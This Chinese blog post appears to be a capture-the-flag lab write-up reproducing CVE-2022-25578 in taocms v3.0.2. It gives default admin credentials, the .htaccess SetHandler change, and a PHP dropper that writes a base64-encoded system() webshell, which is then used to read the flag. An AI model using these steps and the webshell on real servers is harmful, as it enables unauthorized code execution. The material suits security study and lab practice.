云镜CVE-2022-25578复现

最新推荐文章于 2023-09-23 00:38:03 发布
最新推荐文章于 2023-09-23 00:38:03 发布
阅读量399 收藏
点赞数 3
分类专栏: 日常练习 漏洞复现 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46684679/article/details/128951792
版权

CVE-2022-25578复现


🍉 === shell
来源:https://yunjing.ichunqiu.com/cve/detail/960?type=1&pay=2

漏洞信息

漏洞名称taocms v3.0.2允许攻击者通过编辑.htaccess文件执行任意代码
漏洞编号CVE-2022-25578
危害等级超危
漏洞类型任意代码执行
漏洞厂商-
漏洞组件.htaccess
受影响版本taocms v3.0.2

漏洞概述 : Taocms v3.0.2 存在安全漏洞,该漏洞允许攻击者通过任意编辑.htaccess 文件来执行代码注入。

漏洞复现

来到主页,点击右下角管理来到后台登录页面,可以在http://www.iaixiang.com/html/9193.html查到该cms的默认用户名admin密码tao,并登录后台管理界面。
请添加图片描述
修改.htaccess文件内容,写入SetHandler application/x-httpd-php,当前目录下的文件以PHP文件执行
请添加图片描述
修改README.md文件,写入webshell:

<?php

file_put_contents('testshell.php',base64_decode('PD9waHAgc3lzdGVtKCRfR0VUWzFdKTs/Pg=='));

?>

请添加图片描述
访问http://eci-2zeh4orhvb4jn5mens07.cloudeci1.ichunqiu.com/README.md就会发现该目录新增一个testshell.php的文件,访问并发现能正常解析请添加图片描述

读取flag

http://eci-2zeh4orhvb4jn5mens07.cloudeci1.ichunqiu.com/testshell.php?1=cat%20/flag
请添加图片描述

伽蓝之堂
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
春秋云境:CVE-2022-25578
一只爱吃橙子的羊
11-30 1376
taocms v3.0.2允许攻击者通过编辑.htaccess文件执行任意代码
CVE-2022-25578
qq_53768710的博客
03-04 349
CVE-2022-25578 taocms v3.0.2允许攻击者通过编辑.htaccess文件执行任意代码
春秋云镜 CVE-2022-25578
qq_22002773的博客
06-30 194
春秋云镜 CVE-2022-25578
【春秋云境】CVE-2022-25578
ZXW_NUDT的博客
02-22 2488
【春秋云境】CVE-2022-25578
春秋云境:CVE-2022-25578(文件包含)
m0_65712192的博客
04-21 955
taocms v3.0.2允许攻击者通过编辑.htaccess文件执行任意代码
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2022-22963 复现Demo
04-14
CVE-2022-22963 复现Demo,A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application ...
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
05-05
XStream拒绝服务漏洞(CVE-2022-41966)响应通告
Microsoft Exchange CVE-2022-41040 & CVE-2022-41082 Nmap检测脚本
10-03
CVE-2022-41040 Microsoft Exchange Server权限提升漏洞 和 CVE-2022-41082 Microsoft Exchange Server 远程执行代码漏洞 Nmap漏洞检测脚本 使用发发: -- @usage -- nmap --script proxynotshell_checker.nse -p...
taocms 代码注入 (CVE-2022-25578
weixin_57567689的博客
10-21 782
taocms 代码注入 (CVE-2022-25578
【春秋云境】CVE-2022-25578靶场WP
果粒程
11-29 577
【春秋云境】CVE-2022-25578靶场WP
taoCMS任意代码执行(CVE-2022-25578
weixin_48968378的博客
07-19 3685
taoCMS是一个完善支持多数据库(Sqlite/Mysql)的CMS网站内容管理系统,是国内最小的功能完善的基于php+SQLite/Mysql的CMS。体积小(仅180Kb)速度快,包含文件管理、数据采集、Memcache整合、用户管理等强大功能,跨平台运行,支持SAE、BAE云服务,阿里云虚拟主机。代码手写采用严格的数据过滤,保证服务器的安全稳定!...
[春秋云境.com] CVE-2022-25578 快速查找flag
BG_ONE的博客
02-11 172
[春秋云境.com] CVE-2022-25578
编辑.htaccess文件执行任意代码(CVE-2022-25578
最新发布
Battery的博客
09-23 6万+
CVE-2022-25578是Taocms v3.0.2中存在的一个安全漏洞,该漏洞允许攻击者通过任意编辑.htaccess文件来执行代码注入攻击。Taocms是一个完善支持多数据库(Sqlite/Mysql)的CMS网站内容管理系统,是国内最小且功能完善的基于php+SQLite/Mysql的CMS管理系统。该系统体积小、速度快,包含文件管理、数据采集、Memcache整合、用户管理等强大功能,且跨平台运行,支持SAE、BAE云服务,以及阿里云虚拟主机。
Taocms 代码注入漏洞(CVE-2022-25578
千寻的博客
12-01 1677
taocms v3.0.2允许攻击者通过编辑.htaccess文件执行任意代码
春秋云镜CVE-2022-0543
09-04
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark的命令注入漏洞(CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值